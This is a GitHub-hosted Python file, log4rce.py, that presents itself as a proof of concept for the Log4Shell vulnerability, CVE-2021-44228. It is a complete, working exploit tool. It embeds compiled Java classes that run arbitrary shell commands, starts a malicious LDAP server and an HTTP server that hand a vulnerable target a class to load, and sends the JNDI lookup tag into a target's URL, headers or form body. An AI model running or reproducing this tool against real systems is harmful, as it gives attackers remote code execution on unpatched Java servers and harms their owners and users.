-
Notifications
You must be signed in to change notification settings - Fork 30
/
log4rce.py
394 lines (295 loc) · 14.5 KB
/
log4rce.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
"""
Pure Python3 PoC for CVE-2021-44228.
alexandre-lavoie
"""
import argparse
import http.client
import http.server
import logging
import multiprocessing
import re
import socket
import socketserver
import struct
import time
import urllib.parse
from typing import Dict, Tuple, Union, List
# Built-in java classes bytes. These were generated from the `./java/*.java` files.
JAVA_CLASSES: Dict[str, bytes] = {
"any": b"\xca\xfe\xba\xbe\x00\x00\x003\x00\x1d\n\x00\x02\x00\x03\x07\x00\x04\x0c\x00\x05\x00\x06\x01\x00\x10java/lang/Object\x01\x00\x06<init>\x01\x00\x03()V\n\x00\x08\x00\t\x07\x00\n\x0c\x00\x0b\x00\x0c\x01\x00\x11java/lang/Runtime\x01\x00\ngetRuntime\x01\x00\x15()Ljava/lang/Runtime;\x08\x00\x0e\x01\x00\x03###\n\x00\x08\x00\x10\x0c\x00\x11\x00\x12\x01\x00\x04exec\x01\x00'(Ljava/lang/String;)Ljava/lang/Process;\x07\x00\x14\x01\x00\x13java/lang/Exception\x07\x00\x16\x01\x00\x07Exploit\x01\x00\x04Code\x01\x00\x0fLineNumberTable\x01\x00\x08<clinit>\x01\x00\rStackMapTable\x01\x00\nSourceFile\x01\x00\x0cExploit.java\x00!\x00\x15\x00\x02\x00\x00\x00\x00\x00\x02\x00\x01\x00\x05\x00\x06\x00\x01\x00\x17\x00\x00\x00\x1d\x00\x01\x00\x01\x00\x00\x00\x05*\xb7\x00\x01\xb1\x00\x00\x00\x01\x00\x18\x00\x00\x00\x06\x00\x01\x00\x00\x00\x01\x00\x08\x00\x19\x00\x06\x00\x01\x00\x17\x00\x00\x00C\x00\x02\x00\x01\x00\x00\x00\x0e\xb8\x00\x07\x12\r\xb6\x00\x0fW\xa7\x00\x04K\xb1\x00\x01\x00\x00\x00\t\x00\x0c\x00\x13\x00\x02\x00\x18\x00\x00\x00\x0e\x00\x03\x00\x00\x00\x04\x00\t\x00\x05\x00\r\x00\x06\x00\x1a\x00\x00\x00\x07\x00\x02L\x07\x00\x13\x00\x00\x01\x00\x1b\x00\x00\x00\x02\x00\x1c",
"linux": b'\xca\xfe\xba\xbe\x00\x00\x003\x00#\n\x00\x02\x00\x03\x07\x00\x04\x0c\x00\x05\x00\x06\x01\x00\x10java/lang/Object\x01\x00\x06<init>\x01\x00\x03()V\n\x00\x08\x00\t\x07\x00\n\x0c\x00\x0b\x00\x0c\x01\x00\x11java/lang/Runtime\x01\x00\ngetRuntime\x01\x00\x15()Ljava/lang/Runtime;\x07\x00\x0e\x01\x00\x10java/lang/String\x08\x00\x10\x01\x00\x07/bin/sh\x08\x00\x12\x01\x00\x02-c\x08\x00\x14\x01\x00\x03###\n\x00\x08\x00\x16\x0c\x00\x17\x00\x18\x01\x00\x04exec\x01\x00(([Ljava/lang/String;)Ljava/lang/Process;\x07\x00\x1a\x01\x00\x13java/lang/Exception\x07\x00\x1c\x01\x00\x0cLinuxExploit\x01\x00\x04Code\x01\x00\x0fLineNumberTable\x01\x00\x08<clinit>\x01\x00\rStackMapTable\x01\x00\nSourceFile\x01\x00\x11LinuxExploit.java\x00!\x00\x1b\x00\x02\x00\x00\x00\x00\x00\x02\x00\x01\x00\x05\x00\x06\x00\x01\x00\x1d\x00\x00\x00\x1d\x00\x01\x00\x01\x00\x00\x00\x05*\xb7\x00\x01\xb1\x00\x00\x00\x01\x00\x1e\x00\x00\x00\x06\x00\x01\x00\x00\x00\x01\x00\x08\x00\x1f\x00\x06\x00\x01\x00\x1d\x00\x00\x00T\x00\x05\x00\x01\x00\x00\x00\x1f\xb8\x00\x07\x06\xbd\x00\rY\x03\x12\x0fSY\x04\x12\x11SY\x05\x12\x13S\xb6\x00\x15W\xa7\x00\x04K\xb1\x00\x01\x00\x00\x00\x1a\x00\x1d\x00\x19\x00\x02\x00\x1e\x00\x00\x00\x0e\x00\x03\x00\x00\x00\x04\x00\x1a\x00\x05\x00\x1e\x00\x06\x00 \x00\x00\x00\x07\x00\x02]\x07\x00\x19\x00\x00\x01\x00!\x00\x00\x00\x02\x00"'
}
INJECTION_TAG = "###"
LISTEN_HOST = "0.0.0.0"
http_logger = logging.getLogger("HTTP")
ldap_logger = logging.getLogger("LDAP")
log4j_logger = logging.getLogger("Log4RCE")
class Serializer():
"""
Stack-based Serialization utility.
"""
__payload: bytes
__size_stack: bytes
def __init__(self):
self.__payload = b""
self.__size_stack = []
def push(self, data: bytes) -> "Serializer":
self.__last = data
self.__payload = data + self.__payload
return self
def pop_size(self) -> "Serializer":
return self.push(bytes([len(self.__payload) - self.__size_stack.pop()]))
def push_size(self, count=1) -> "Serializer":
for _ in range(count):
self.__size_stack.append(len(self.__payload))
return self
def build(self) -> bytes:
return self.__payload
def __repr__(self) -> str:
return f"Serializer{self.__payload}"
class JavaClass():
"""
Wrapper for Java class bytecode.
"""
__raw: bytes
def __init__(self, raw: bytes):
self.__raw = raw
@classmethod
def load(cls, path: str) -> "JavaClass":
with open(path, "rb") as h:
raw = h.read()
if not raw.startswith(b"\xca\xfe\xba\xbe"):
raise Exception(f"Trying to load non-compiled Java class `{path}`.")
return JavaClass(raw)
@classmethod
def str_size(cls, data: str) -> bytes:
return b"\x01" + struct.pack("!H", len(data))
@property
def raw(self) -> bytes:
return self.__raw
@property
def name(self) -> str:
return re.findall(b"([a-zA-Z0-9]*)\.java", self.__raw)[0].decode()
def inject(self, payload: Union[str, bytes]):
if isinstance(payload, str):
payload = payload.encode()
if not INJECTION_TAG.encode() in self.__raw:
raise Exception(f"No `{INJECTION_TAG}` tag to inject payload into.")
index = self.__raw.index(INJECTION_TAG.encode())
self.__raw = self.__raw[:index-3] + self.str_size(payload) + payload + self.__raw[index+3:]
def __repr__(self) -> str:
return f"JavaClass({self.__raw})"
class LDAPResponse():
"""
Builder for LDAP query response.
"""
__query_name: str
__attributes: dict
def __init__(self, query_name: str, attributes: dict):
self.__query_name = query_name
self.__attributes = attributes
def serialize(self) -> bytes:
s = Serializer()
s.push_size(2)
for k, v in reversed(self.__attributes.items()):
s.push_size(3).push(v.encode()).pop_size().push(b"\x04").pop_size().push(b"1")
s.push_size().push(k.encode()).pop_size().push(b"\x04").pop_size().push(b"0")
s.push(b"0\x81\x82")
s.push_size().push(self.__query_name.encode()).pop_size().push(b"\x04").pop_size()
s.push(b"\x02\x01\x02d\x81").pop_size().push(b"0\x81")
SUCCESS_RESPONSE = b"0\x0c\x02\x01\x02e\x07\n\x01\x00\x04\x00\x04\x00"
return s.build() + SUCCESS_RESPONSE
class LDAPHandler(socketserver.BaseRequestHandler):
"""
Malicious query handler.
"""
__java_class: JavaClass
__path: str
def __init__(self, java_class: JavaClass, path: str):
self.__java_class = java_class
self.__path = path
def __call__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
def handle(self):
ldap_logger.info(f"Query from {self.request.getpeername()}")
handshake = self.request.recv(8096)
self.request.sendall(b"0\x0c\x02\x01\x01a\x07\n\x01\x00\x04\x00\x04\x00")
time.sleep(0.5)
query = self.request.recv(8096)
if len(query) < 10:
return
query_name = query[9:9+query[8:][0]].decode()
response = LDAPResponse(query_name, {
"javaClassName": self.__java_class.name,
"javaCodeBase": self.__path,
"objectClass": "javaNamingReference",
"javaFactory": self.__java_class.name
})
self.request.sendall(response.serialize())
time.sleep(0.5)
acknowledge = self.request.recv(8096)
class HTTPHandler(http.server.BaseHTTPRequestHandler):
"""
Malicious fetch handler.
"""
__java_class: JavaClass
def __init__(self, java_class: JavaClass):
self.__java_class = java_class
def __call__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
def do_GET(self):
self.send_response(200)
self.send_header("Content-type", "application/octet-stream")
self.end_headers()
self.wfile.write(self.__java_class.raw)
def log_message(self, format, *args):
http_logger.info(f"Request from {self.client_address} to {self.path}")
class Log4RCE():
"""
Main handler for Log4RCE exploit.
"""
__process: List[multiprocessing.Process]
__local_ports: Dict[str, int]
__remote_hosts: Dict[str, str]
__remote_ports: Dict[str, int]
__java_class: JavaClass
def __init__(self, local_ports: Dict[str, int], remote_hosts: Dict[str, str], remote_ports: Dict[str, int], java_class: JavaClass):
self.__process = []
self.__local_ports = local_ports
self.__remote_hosts = remote_hosts
self.__remote_ports = remote_ports
self.__java_class = java_class
@property
def jndi_ldap_tag(self):
return f"${{jndi:ldap://{self.__remote_hosts['ldap']}:{self.__remote_ports['ldap']}/{self.__java_class.name}}}"
@property
def target_url(self) -> str:
return f"http://{self.__remote_hosts['http']}:{self.__remote_ports['http']}/"
def _start_process(self, target: any):
process = multiprocessing.Process(target=target)
self.__process.append(process)
process.start()
def _http_process(self):
http.server.HTTPServer.allow_reuse_address = True
with http.server.HTTPServer((LISTEN_HOST, self.__local_ports["http"]), HTTPHandler(self.__java_class)) as server:
server.serve_forever()
def start_http(self):
http_logger.info(f"Running on local port {self.__local_ports['http']}")
http_logger.info(f"Remote target is {self.target_url + self.__java_class.name + '.class'}")
self._start_process(target=self._http_process)
def _ldap_process(self):
socketserver.TCPServer.allow_reuse_address = True
with socketserver.TCPServer((LISTEN_HOST, self.__local_ports["ldap"]), LDAPHandler(self.__java_class, self.target_url)) as server:
server.serve_forever()
def start_ldap(self):
ldap_logger.info(f"Running on local port {self.__local_ports['ldap']}")
self._start_process(target=self._ldap_process)
def exploit(self):
log4j_logger.warning(f"Use the payload {self.jndi_ldap_tag}")
while True:
pass
def start(self):
self.start_http()
self.start_ldap()
time.sleep(1)
self.exploit()
# TODO: Increase time if no answer.
time.sleep(5)
for process in self.__process:
process.kill()
class HTTPLog4RCE(Log4RCE):
"""
An overload of Log4RCE to automatically inject a POST form data.
"""
url: str = ""
method: str = "POST"
data: str = ""
headers: str = ""
def exploit(self):
log4j_logger.info(f"Sending payload to {self.url}")
parsed_url = urllib.parse.urlparse(self.url.replace(INJECTION_TAG, self.jndi_ldap_tag))
if parsed_url.scheme == "https":
conn_class = http.client.HTTPSConnection
else:
conn_class = http.client.HTTPConnection
if ":" in parsed_url.netloc:
host, port = parsed_url.netloc.split(":")
conn = conn_class(host, int(port))
elif parsed_url.scheme == "https":
conn = conn_class(parsed_url.netloc, 443)
else:
conn = conn_class(parsed_url.netloc, 80)
url = parsed_url.path
if len(parsed_url.query) > 0:
url += "?" + parsed_url.query
headers = {k: v[0] for k, v in urllib.parse.parse_qs(self.headers.replace(INJECTION_TAG, self.jndi_ldap_tag)).items()}
if self.method == "GET":
conn.request(method=self.method, url=url, headers=headers)
else:
body = self.data.replace(INJECTION_TAG, self.jndi_ldap_tag)
if not "Content-Type" in headers:
headers["Content-Type"] = "application/x-www-form-urlencoded"
conn.request(method=self.method, url=url, body=body, headers=headers)
def main():
parser = argparse.ArgumentParser(description="All-In-One Log4JRCE by alexandre-lavoie")
parser.add_argument("--java_class", "-j", help="The Java class file to run on the target.", default=None)
parser.add_argument("--target", "-b", help="The built-in Java class to run on the target.", choices=JAVA_CLASSES.keys(), default="any")
parser.add_argument("--payload", "-p", help="The payload to run on the target.", default=None)
parser.add_argument("--rhosts", "-rh", help="Sets all rhost variables.", default=None)
parser.add_argument("--http_port", "-hl", help="The local port to serve the HTTP server.", type=int, default=1337)
parser.add_argument("--http_rhost", "-hh", help="The remote host name that serves the HTTP server.", default="127.0.0.1")
parser.add_argument("--http_rport", "-hr", help="The remote port where the HTTP server will be exposed.", type=int, default=None)
parser.add_argument("--ldap_port", "-ll", help="The local port to run the LDAP server.", type=int, default=1387)
parser.add_argument("--ldap_rhost", "-lh", help="The remote host name that serves the LDAP server.", default="127.0.0.1")
parser.add_argument("--ldap_rport", "-lr", help="The remote port to where the LDAP server will be exposed.", type=int, default=None)
parser_modes = parser.add_subparsers(help="Log4RCE modes.", dest="mode")
parser_manual = parser_modes.add_parser("manual", help="Mode to enter JNDI tag manually.")
parser_http = parser_modes.add_parser("http", help="Mode to send HTTP requests.")
parser_http.add_argument("--url", "-u", help="The target URL.", required=True)
parser_http.add_argument("--method", "-X", help="The request method.", choices=('GET', 'POST'), default="GET")
parser_http.add_argument("--data", "-d", help="The request body.", default="")
parser_http.add_argument("--headers", "-H", help="The request headers.", default="")
args = parser.parse_args()
local_ports = {
"http": args.http_port,
"ldap": args.ldap_port
}
if args.rhosts:
remote_hosts = {
"http": args.rhosts,
"ldap": args.rhosts
}
else:
remote_hosts = {
"http": args.http_rhost,
"ldap": args.ldap_rhost
}
remote_ports = {
"http": args.http_rport if args.http_rport else local_ports["http"],
"ldap": args.ldap_rport if args.ldap_rport else local_ports["ldap"],
}
if args.java_class:
java_class = JavaClass.load(args.java_class)
else:
java_class = JavaClass(JAVA_CLASSES[args.target])
if args.payload:
java_class.inject(args.payload)
if args.mode == "http":
log4rce_class = HTTPLog4RCE
else:
log4rce_class = Log4RCE
log4rce = log4rce_class(
local_ports=local_ports,
remote_hosts=remote_hosts,
remote_ports=remote_ports,
java_class=java_class
)
if args.mode == "http":
log4rce.url = args.url
log4rce.method = args.method
log4rce.data = args.data
log4rce.headers = args.headers
log4rce.start()
if __name__ == "__main__":
logging.basicConfig(level=logging.INFO)
main()